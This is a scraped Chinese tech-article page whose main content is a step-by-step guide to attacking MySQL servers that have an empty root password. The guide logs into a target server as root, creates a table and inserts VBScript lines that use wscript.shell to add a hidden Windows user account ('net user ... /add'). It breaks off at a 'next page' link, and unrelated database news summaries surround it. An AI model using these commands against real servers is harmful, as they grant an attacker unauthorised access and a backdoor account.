后来，自己思索想到一个办法，在我测试的几台有此漏洞的机中均获得

开发技术指南» 文章正文

引言：后来，自己思索想到一个办法，在我测试的几台有此漏洞的机中均获得

·sqlserver中的union,cube,rollup,cumpute运算符 »显示摘要«

摘要：周末去面试，被问到union all,cube,rollup等的用法，汗出如注！只好在事后总结一下了，亡羊补牢，未为晚矣！union 运算符是将两个或更多查询的结果组合为单个结果集该结果集包含联合查询中的所有查询的全部行。这与使用联接组合两个表中的列不同。使用 union 组合查询的结果集有两个最基本的规则： 1。所有查询中的列数和列的顺序必须相同。 2。数据类型必须兼容 a.union的结果集列名与第一个select语句中的结果集中的列名相同，其他s......

·sybase的力作“企鹅宝典”（集成化linux企业级数据库服务器） »显示摘要«

摘要： 7月6日，知名的数据库厂商syabse公司联手ibm和novell公司，共同推出了一套名为“企鹅宝典”的集成化linux企业级数据库服务器。 “企鹅宝典”是个三强联手的“大集成”，涵盖了sybase ase数据库、ibm openpower 64位服务器和novell suse linux操作系统，可说是“三位一体”——数据库、服务器和操作系统一样都不缺。原文链接：http://www.softhouse.com.cn/html/200507/20050......

MYSQL用户root密码为空攻击方法
文章来源:sevenline

在网上我也找到一些利用此漏洞的方法，一般就是写一个asp或php的后门，不仅很麻烦，而且还要猜解网站的目录，如果对方没有开iis，那我们岂不没办法了？？

【相关文章:测试，1，2，3...测试...检查？】

【扩展阅读:使用 SQL Server 2005中的】

　　后来，自己思索想到一个办法，在我测试的几台有此漏洞的机中均获得了成功，现将我的攻击方法公布如下：【扩展信息:从 SQL Server 2005 中处】

文章来源:sevenline

　　后来，自己思索想到一个办法，在我测试的几台有此漏洞的机中均获得了成功，现将我的攻击方法公布如下：

　　 1、连接到对方mysql 服务器

　　 mysql -u root -h 192.168.0.1

　　 mysql.exe 这个程序在你安装了mysql的的bin目录中

　　 2、让我们来看看服务器中有些什么数据库

　　 mysql>show databases;

　　 mysql默认安装时会有mysql、test这两个数据库，如果你看到有其它的数据库那么就是用户自建的数据库。

　　 3、让我们进入数据库

　　 mysql>use test;

　　我们将会进入test数据库中

　　 4、查看我们进入数据库中有些什么数据表

　　 mysql>show tables;

　　默认的情况下，test中没有任何表的存在。

　　以下为关键的部分

　　 5、在test数据库下创建一个新的表；

　　 mysql>create table a (cmd text);

　　好了，我们创建了一个新的表，表名为a，表中只存放一个字段，字段名为cmd，为text文本。

　　 6、在表中插入内容

　　 mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );

　　 mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user zjl317 zjl317 /add"",0) " );

... 下一页

·oracle 10g对垒ibm db2 »显示摘要«

摘要：随着越来越多公司开始倚重于数据库，数据库的提供商们不可避免地要在销量上相互较劲。在这些厂商中，有一个霸主叫做ibm，由它提供的db2数据库管理系统允许客户公司构建基于商业需求的应用程序。db2数据库中包含对开放标准以及对诸如j2ee和微软的.net等平台发展的支持。另外一个霸主就是大名鼎鼎的甲骨文（oracle），其最新数据库产品10g，为企业进行网格处理（grid computing）而设计开发。甲骨文“自夸”：10g除了能够减少管理费用，还能有效......

» 本期热门文章：

· 热门栏目：

» 相关精选文章

» 其它相关：